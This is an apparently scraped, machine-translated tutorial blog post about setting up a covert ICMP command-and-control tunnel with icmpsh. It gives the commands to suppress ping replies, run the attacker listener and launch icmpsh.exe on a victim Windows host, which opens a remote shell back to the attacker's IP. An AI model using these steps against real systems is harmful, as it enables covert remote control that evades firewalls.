当前位置:网站首页>Hidden C2 tunnel -- use of icmpsh of ICMP
Hidden C2 tunnel -- use of icmpsh of ICMP
2022-07-04 10:35:00 【I·CE】
Learning records of pure rookies , Please correct any mistakes
Let's first get to know ICMP Make an agreement
ICMP Used to pass errors , control , Query and other information , At the network level , because IP The agreement is unreliable , And then there is ICMP agreement , Due to network detection , Route tracking and feedback
ICMP Message type :
Code fields of unreachable types often take values :
The timeout message code field is commonly used :
Message format :
Refer to https://blog.csdn.net/qq_21231413/article/details/88171590?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164464850716780265452295%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=164464850716780265452295&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allfirst_rank_ecpm_v1~rank_v31_ecpm-2-88171590.pc_search_result_cache&utm_term=icmp%E5%8D%8F%E8%AE%AE&spm=1018.2226.3001.4187
hide c2 Tunnel of icmpsh
principle : During covert transmission , The attacker hides the command to be executed in ICMP_ECHO In the packet , Broiler receives packets , Solve the command and execute it on the host inside the firewall, and then hide the execution result in ICMP_ECHOREPLY In the packet , Send it to the external attacker
Use key points : Data section
The picture below is ping, then wireshark Grasping ICMP package
ps:ICMP The message is processed by the system kernel , Do not occupy any ports ( Generally, the communication needs ports , For example, you visit a website [80 port ], This opportunity randomly generates a greater than 1023 To access )
Tools :icmpsh Deal with deformities ping data
Attacked must be Windows,,,
1. download :
git clone https://github.com/inquisb/icmpsh.git
2. close ping reply , Prevent the kernel itself from ping Package response , refresh
sysctl -w net.ipv4.icmp_echo_ignore_all=1 # close ping reply ,0 Turn on
3. Installation environment
git clone https://github.com/SecureAuthCorp/impacket.git # If you fail, try connecting directly to the physical network
cd impacket
sudo python setup.py install
The attack end :
cd icmpsh
./icmpsh_m.py <attacker’ s-ip> The attacked party # command
The attacked plane ordered
icmpsh.exe -t <attacker’ s-ip>
perform whoami
ok Let's see ICMP Data packets ( There are too many packets , Don't stop grabbing , Packets always have ,wireshark too strong ) data Part is whoami
Learn from vulnerability banks
边栏推荐
- [Galaxy Kirin V10] [server] system startup failed
- Number of relationship models
- Service developers publish services based on EDAs
- Three schemes of ZK double machine room
- uniapp---初步使用websocket(长链接实现)
- system design
- Quick sort (C language)
- [Galaxy Kirin V10] [server] iSCSI deployment
- Latex arranges single column table pictures in double column format articles
- Lavel document reading notes -how to use @auth and @guest directives in lavel
猜你喜欢
Some summaries of the third anniversary of joining Ping An in China
Collection of practical string functions
Remove linked list elements
On binary tree (C language)
From programmers to large-scale distributed architects, where are you (2)
[FAQ] summary of common causes and solutions of Huawei account service error 907135701
【Day1】 deep-learning-basics
The future education examination system cannot answer questions, and there is no response after clicking on the options, and the answers will not be recorded
今日睡眠质量记录78分
Rhcsa day 9
随机推荐
[Galaxy Kirin V10] [server] soft RAID configuration
[Galaxy Kirin V10] [server] grub default password
Latex arranges single column table pictures in double column format articles
Delayed message center design
DCL statement of MySQL Foundation
Ruby时间格式转换strftime毫秒匹配格式
BGP advanced experiment
From programmers to large-scale distributed architects, where are you (2)
How to use diff and patch to update the source code
Architecture introduction
【Day2】 convolutional-neural-networks
Hlk-w801wifi connection
leetcode1-3
How to quickly parse XML documents through C (in fact, other languages also have corresponding interfaces or libraries to call)
Network connection (II) three handshakes, four waves, socket essence, packaging of network packets, TCP header, IP header, ACK confirmation, sliding window, results of network packets, working mode of
Rhsca day 11 operation
[Galaxy Kirin V10] [server] failed to start the network
【FAQ】华为帐号服务报错 907135701的常见原因总结和解决方法
按键精灵打怪学习-识别所在地图、跑图、进入帮派识别NPC
Check 15 developer tools of Alibaba